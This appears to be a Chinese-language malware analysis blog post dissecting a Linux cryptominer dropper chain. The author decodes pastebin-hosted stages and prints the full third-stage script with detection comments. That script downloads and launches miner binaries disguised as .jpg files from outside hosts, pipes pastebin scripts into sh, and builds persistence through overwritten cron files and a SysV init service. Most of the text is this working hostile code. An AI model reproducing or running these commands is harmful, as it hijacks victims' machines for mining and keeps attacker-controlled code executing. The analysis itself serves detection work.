#######################################
function system() {
  if [ ! -f "/bin/httpdns" ]; then
    curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
    if [ ! -f "/bin/httpdns" ]; then
      wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
    fi
    sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >>/etc/crontab
  fi

}

先看看这个链接是啥玩儿

curl https://pastebin.com/raw/698D7kZU

/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

又需要你再获取再解码,他不烦吗?

最后得到下面的内容

#!/bin/sh
# Third-stage script installed as /bin/httpdns (decoded from pastebin
# raw/kDSLjxfQ).  Despite the /bin/sh shebang it uses the bash-only
# 'function' keyword, so it only parses where /bin/sh is bash; on dash it
# fails at the first function definition.  It is invoked by cron as
# "/bin/sh /bin/httpdns".
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

#######################################
# Same miner stage 1 as the first-stage script, with a 120 s connect
# timeout added to curl: if no netstat line contains "13531", fetch
# /tmp/kworkerds (curl, then wget) and start it detached.
# Detection: /tmp/kworkerds; outbound xmr.f2pool.com:13531.
#######################################
function downloadrun() {
  ps=$(netstat -anp | grep 13531 | wc -l)
  if [ ${ps} -eq 0 ]; then
    if [ ! -f "/tmp/kworkerds" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
      if [ ! -f "/tmp/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
      fi
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    else
      nohup /tmp/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

#######################################
# Same miner stage 2 as the first-stage script (curl with a 120 s connect
# timeout): drops /bin/config.json and /bin/kworkerds when port 13531 is
# still unused, then starts /bin/kworkerds detached.
# Detection: non-package files /bin/config.json and /bin/kworkerds.
#######################################
function downloadrunxm() {
  pm=$(netstat -anp | grep 13531 | wc -l)
  if [ ${pm} -eq 0 ]; then
    if [ ! -f "/bin/config.json" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
      if [ ! -f "/bin/config.json" ]; then
        wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
      fi
    fi
    if [ ! -f "/bin/kworkerds" ]; then
      curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
      if [ ! -f "/bin/kworkerds" ]; then
        wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
      fi
      nohup /bin/kworkerds >/dev/null 2>&1 &
    else
      nohup /bin/kworkerds >/dev/null 2>&1 &
    fi
  fi
}

#######################################
# SysV init persistence.  Drops /usr/sbin/kworker and an init script
# /etc/init.d/kworker (both served as .jpg from thyrsi.com, both made
# world-writable with chmod 777) and registers the service with
# 'chkconfig --add'.  Neither file's contents are shown in the writeup.
# chkconfig exists on RHEL/CentOS-style systems; elsewhere the last line
# simply fails and nothing checks it.
# Detection: /etc/init.d/kworker, /usr/sbin/kworker, a 777 binary under
# /usr/sbin, 'chkconfig --list kworker'.
#######################################
function init() {
  if [ ! -f "/usr/sbin/kworker" ]; then
    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
    if [ ! -f "/usr/sbin/kworker" ]; then
      wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
    fi
  fi
  if [ ! -f "/etc/init.d/kworker" ]; then
    curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
    if [ ! -f "/etc/init.d/kworker" ]; then
      wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
    fi
  fi
  chkconfig --add kworker
}

#######################################
# Cron persistence, reduced variant of the first-stage echocron: the same
# three cron files are overwritten, but the cron.d entry omits the
# "chmod 755 curl" step and curl's -fsSL flags, and no timestomping is
# done here.
# Detection: the three cron files referencing pastebin.com/raw/xbY7p5Tb.
#######################################
function echocron() {
  echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/etc/cron.d/root
  echo -e "*/30 * * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/root
  mkdir -p /var/spool/cron/crontabs
  echo -e "* */10 * * *	/usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" >/var/spool/cron/crontabs/root
}

# Entry point: the same pastebin switch as the first stage.  "update" ->
# wipe the dropped binaries and re-arm cron only; anything else (including
# an empty reply when curl fails -- hence the 'x' suffix) -> miner, SysV
# persistence, cron, then the ten-second port check and /bin fallback.
# Unlike the first stage there is no competitor cleanup, no /bin/httpdns
# step and no rootkit/log-wipe step here.
update=$(curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH)
if [ ${update}x = "update"x ]; then
  rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
  echocron
else
  downloadrun    # /tmp/kworkerds
  init           # /usr/sbin/kworker + /etc/init.d/kworker
  echocron       # cron persistence
  sleep 10
  port=$(netstat -anp | grep 13531 | wc -l)
  if [ ${port} -eq 0 ]; then
    downloadrunxm
  fi
fi
#
#�

这脚本不得不说,真的有毒。

sh作为解析器,写函数的时候,前面还加function

重命名成httpdns丢到bin目录,还给了执行权限。

在crontab里面增加了定时任务。
